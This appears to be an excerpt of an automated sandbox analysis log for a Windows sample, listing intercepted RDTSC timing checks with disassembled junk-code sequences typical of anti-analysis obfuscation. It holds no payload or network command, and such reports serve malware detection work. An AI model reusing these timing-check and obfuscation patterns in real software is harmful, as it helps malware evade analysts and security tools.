Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BCA7 second address: A5BCC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F44646ECA46h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007F44646ECA4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BCC1 second address: A5BCC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BCC5 second address: A5BCCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B9F8 second address: A5BA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A607F2 second address: A60810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F44646ECA6Eh 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FB59 second address: A5FB76 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F4465131BD3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FB76 second address: A5FB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F44646ECA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FB81 second address: A5FB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FD30 second address: A5FD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FD34 second address: A5FD42 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60055 second address: A60059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A60059 second address: A60063 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE494 second address: 9CE498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE498 second address: 9CE4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F4465131BCCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE4AE second address: 9CE4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE4B6 second address: 9CE4C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4465131BC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE4C2 second address: 9CE4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A687DF second address: A68810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD1h 0x00000007 jmp 00007F4465131BD3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F4465131BC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670B6 second address: A670BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670BC second address: A670C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670C0 second address: A670EA instructions: 0x00000000 rdtsc 0x00000002 je 00007F44646ECA46h 0x00000008 jmp 00007F44646ECA52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F44646ECA46h 0x00000017 jne 00007F44646ECA46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670EA second address: A670EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A670EE second address: A670F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A674D4 second address: A674DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10580 second address: A105F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, 0D17h 0x00000010 mov ebx, dword ptr [ebp+124837B5h] 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F44646ECA48h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D1D5Ch], eax 0x00000036 add eax, ebx 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F44646ECA48h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D1D87h] 0x00000058 nop 0x00000059 jp 00007F44646ECA50h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 pop eax 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A67AF0 second address: A67AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A67AF8 second address: A67AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A684F5 second address: A6850A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4465131BCCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6AE8E second address: A6AE9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B1AF second address: A6B1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B1B3 second address: A6B1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B1B7 second address: A6B1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B489 second address: A6B48F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B48F second address: A6B4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B4A1 second address: A6B4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6B4A5 second address: A6B4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73903 second address: A73907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73907 second address: A7390D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71976 second address: A7197C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71AF3 second address: A71AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71C68 second address: A71C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71C6E second address: A71C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7225B second address: A7225F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72D95 second address: A72D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72D99 second address: A72DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F44646ECA4Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A732FC second address: A73302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73302 second address: A73308 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73308 second address: A73312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73312 second address: A73316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73316 second address: A7332F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4465131BCEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A768D6 second address: A768F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA56h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76A15 second address: A76A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76A1F second address: A76A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c jng 00007F44646ECA52h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F44646ECA4Eh 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76B94 second address: A76BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E36 second address: A76E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E3A second address: A76E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4465131BD8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E58 second address: A76E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E5E second address: A76E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BD3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76FE5 second address: A76FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76FEC second address: A76FF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76FF1 second address: A77037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA59h 0x00000009 je 00007F44646ECA46h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jp 00007F44646ECA63h 0x00000019 jmp 00007F44646ECA57h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BF4A second address: A7BF55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BF55 second address: A7BF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jng 00007F44646ECA46h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BF69 second address: A7BF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BF6F second address: A7BF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F44646ECA4Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A835DB second address: A835DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A835DF second address: A835E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A83B60 second address: A83B66 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A83B66 second address: A83B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A83B71 second address: A83B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4465131BC6h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F4465131BDBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A85176 second address: A8519C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA50h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F44646ECA4Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A8DB second address: A8A8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCEh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C5F5 second address: A9C5F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C5F9 second address: A9C61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4465131BC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F4465131BCEh 0x00000012 jnc 00007F4465131BC6h 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C61B second address: A9C646 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F44646ECA46h 0x00000009 pop esi 0x0000000a jnc 00007F44646ECA4Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 js 00007F44646ECA4Ah 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007F44646ECA46h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C444 second address: A9C44A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C44A second address: A9C49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F44646ECA46h 0x0000000d push edx 0x0000000e pop edx 0x0000000f jno 00007F44646ECA46h 0x00000015 popad 0x00000016 pop ebx 0x00000017 push edx 0x00000018 pushad 0x00000019 jp 00007F44646ECA46h 0x0000001f jmp 00007F44646ECA57h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push edi 0x00000028 jmp 00007F44646ECA55h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F830 second address: A9F84A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA82AC second address: AA82B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA82B0 second address: AA82CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4465131BD7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA82CD second address: AA82D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA82D7 second address: AA82DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF9A0 second address: AAF9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF9A4 second address: AAF9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF9A8 second address: AAFA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F44646ECA52h 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F44646ECA4Fh 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F44646ECA4Fh 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F44646ECA4Fh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F44646ECA4Eh 0x0000002e jmp 00007F44646ECA4Ch 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAFA16 second address: AAFA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF84C second address: AAF860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF860 second address: AAF866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB76C8 second address: AB76CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB76CF second address: AB76D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB76D5 second address: AB76DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB76DE second address: AB76E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB79CD second address: AB79F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F44646ECA54h 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7B47 second address: AB7B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7CC3 second address: AB7CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7CCD second address: AB7CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F29 second address: AB7F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F2F second address: AB7F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F38 second address: AB7F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F3E second address: AB7F50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4465131BCCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F50 second address: AB7F5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007F44646ECA46h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
